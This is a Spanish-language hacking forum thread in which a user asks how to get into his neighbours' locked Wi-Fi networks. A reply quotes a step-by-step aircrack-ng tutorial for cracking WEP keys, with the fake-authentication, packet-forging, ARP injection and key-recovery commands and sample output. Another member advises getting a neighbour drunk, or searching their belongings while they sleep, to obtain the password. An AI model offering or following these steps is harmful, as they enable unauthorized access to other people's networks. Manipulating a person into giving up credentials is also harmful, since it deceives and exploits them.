Group: Hackerss Member
Member No.: 6,355
q onda!!nuevament yo, creoq no naci para ser hacker, jajaja chance y si, bueno keria solicitar un hacker para q ya deplano vaya a mi kasa y me ayude, o pido ayuda para consguir las contraseñas d infinitum, ya q en mi kasa ha 4 señale speor todas con candado(inches vecinos envidiosos!!!! vdD?) bueno epseor m puedan echar la mano nuevamente saludos!!!!
Group: Colaborador
From: Ciudad Juarez,Chih, Mexico
Member No.: 354
Ya habias preguntado por eso antes, marcela se tomo la molestia de hacer un super tutorial de como hacerlo, nomas leetelo y podras romper todos esos candados.......
QUOTE(marcela @ Nov 3 2008, 12:02 AM)
Tutorial: Crackear WEP con aircrack
bueno la vdd no soy muy buena haciendo tutoriales detallados y para gente ke no tiene mucho connocimiento ya ke aveces por tratar de explicar mucho me salgo mucho del tema y acaba un tutorial enorme, asi ke tratare de ser breve y poner lo mas importante.
En este tutorial tambien te dare todos los paketes ke necesitas ke instalar para ke esto funcione, como te prometi la semana pasada ke te iva a hacer un toturial pero nunca tube tiempo y bueno como me kede con la duda de como se hace en windows decidi hacerlo en la computadora de un amigo y ya me salio .
Empesamos :
Lo primero y lo mas importante ke necesitas hacer es tener un adapter ke funcione con airodump. bueno para esta parte la vdd no c mucho yo me base por lo ke dice en aircrack-ng.org ke la vdd explican muy bn para ke necesitas cada cosa y tambien use el tutorial de ellos para poner hacer esto nomas ke su tutorial esta algo complicado y la vdd espero ke este sea un poko mas facil.
lees la informacion y de ahi deves de saber ke adaptador necesitas.
Despues de esto tienes ke instalar el driver indicado. en mi caso yo use Commview drives. si tu carjeta no es compatible con este driver entos necesitas instalar Wildpackets Drives.
Despues de esto Airodump-ng deve de estar capturado la informacion de los networks. este processo es algo tardado almenos ke lo intentes con un network de compania.
los siente es algo ke deves de tener en mente
1) BSSID del network ke kieres crackear = MAC address 2) ESSId del network ke kieres crackear = nombre del network ( ejemplo : wifi123, minetwork ) 3) El MAC de la tarjeta ke estas usando para monitoriar los paketes
ahora dejas la command prompts ke tenias abierta y abres otra para el paso 6
Paso 6:
escrbe esto en la nueva command prompt
CODE
cd c:\aircrack\
ENTER
Paso 7:
escribe lo siente :
CODE
aireplay-ng -1 0 -e ESSID-OF-EL-NETWORK-TU-QUIERES-CRACKEAR -a BSSID-DEL-NETWORK-TU-KIERES-CRACKEAR -h MAC-DE-LA-CARJETA-KE-TU-ESTAS-USAND-PARA-MONITORIAR 127.0.0.1:666
como c ke esta algo consufo creo ke usare un ejemplo para ver si me enteindes mejor:
ESSId = wifi123 BSSID = 01:24:85:67:90:02 Mac de la tarjeta ke estoy usando : 02:23:46:68:90:01
entos con esto tendras algo asi:
CODE
aireplay-ng -1 0 -e wifi123 -a 01:24:85:67:90:02 -h 02:23:46:68:90:01 127.0.0.1:666
despues te saldra algo asi:
CODE
Sending Authentication Request Authentication successful Sending Association Request Association successful
Paso 8:
En la misma command prompt donde acabas de hacer paso 7 pones lo siguiente:
Saving chosen packet in replay_src-0124-161120.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
nota: esta parte es muy importante fragment-0124-161129.xor
Paso 10:
Preciona CTRL + C en la command prompt ke usaste en paso 8 y despues escribe lo siguiente:
CODE
packetforge-ng -0 -a BSSID-DEL-NETWORK-KE-TU-KIERES CRACKEAR -h MAC-DE-LA-TARJETA-KE-TU-ESTAS-USANDO-PARA-MONITORIAR -k 192.168.1.100 -l (= an ELL not a 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
fragment-0124-161129.xor <--- esta parte fue la ke te dije ke guardaras de el paso 8
Paso 11:
Ahora ke ya pedimos el packete entos podemos empesar a injectar!
En la command prompt ke usaste en el paso 9 vas a escribir lo siguiente:
CODE
aireplay-ng -2 -r arp-request 127.0.0.1:666
entos despues te va a salir algo asi:
CODE
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:0F:B5:AB:CB:9D
nota: nombrefile = el nombre de el file donde la informacion de los pakettes se guardaron.
Paso13:
Cuando pienses que tienes suficientre, presiona CTRL + C en el command prompt donde tienes airodump-ng corriendo y escribe lo siguiente:
CODE
aircrack-ng -n 64 nombrefile.cap
nota: nombrefile = al ke usaste en el paso anterior
64 = eso depende de los bits ke tengas ( ejemplo si tienes 64 enots pones 64 enves de 128 )
despues de eso te va a parecr un mensaje diciendo:
CODE
KEY FOUND: ( aparece el numero )
si usaste Wildpackets Drives creo ke en alguno de los links ke puso freddy esta como c hace, y creo ke es hata mas facil....
Bueno pues esto es todo... como dije al principio soy muy mala haciendo tutoriales pero espero ke le hayan entendido y tambien ke hayan compredido ke windows apesta y ke si kieren ahcer algo pues deverian de comprar una MAC o deperdido instalar linux, asi no perderias tanto el tiempo.
Les pido una disculpa por mi ortografia ke nunca a sido buena, y tambien por aver puesto muchas cosas en ingles pero la vdd no supe decirlo en espnaiol
Tambien alguien ke sepa mas del tema acerca de los chips pues aver si me pueden ayudar explicar eso mejor ya ke yo solo c lo basico y me base en la pagina pero la pagina esta ingles y nunca encontre version espnaiol
Group: Hackerss Member
From: Missouri, USA
Member No.: 933
QUOTE(evilrommel @ Nov 8 2008, 11:16 AM)
q onda!!nuevament yo, creoq no naci para ser hacker, jajaja chance y si, bueno keria solicitar un hacker para q ya deplano vaya a mi kasa y me ayude, o pido ayuda para consguir las contraseñas d infinitum, ya q en mi kasa ha 4 señale speor todas con candado(inches vecinos envidiosos!!!! vdD?) bueno epseor m puedan echar la mano nuevamente saludos!!!!
rommel, si no te sivio el tuto o se te hace muy complicado ntp... has el plan B en tu caso esto es lo ke yo haria priemro investigaria kienes son tus vecinos y buscaria al sexo opuesto... en mi caso a un hombre de masomenos de mi edad.. y como buena vecina ke soy.. iria a su casa con una botella de vino y la cena y ahi " diske la conoces mas " y luego ya ke esta super tomado de broma le dices ke no tiens internet ke cual es su pass.. y si te lo da pues bravo por ti si no te lo da pues cuando se kede dormid@ tratas de averiguar el pass o algo asi ya se te ocurrira en el momento
ahora si nada de eso funciono entos vas a tener ke decirle a nullcool ke vaya a tu casa y lo haga por ti jajajajajja
--------------------
Este espacio esta en RENTA Para precios, info, o preguntas mandame un mensaje privado o email
Group: Root Admin
From: Argentina
Member No.: 2,479
no me di cuenta que era el mismo de aquel post de hacking wep xD... solo lo habia movido a publicidad, lo cierro ... cualquier duda sigue el post anterior.
--------------------
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.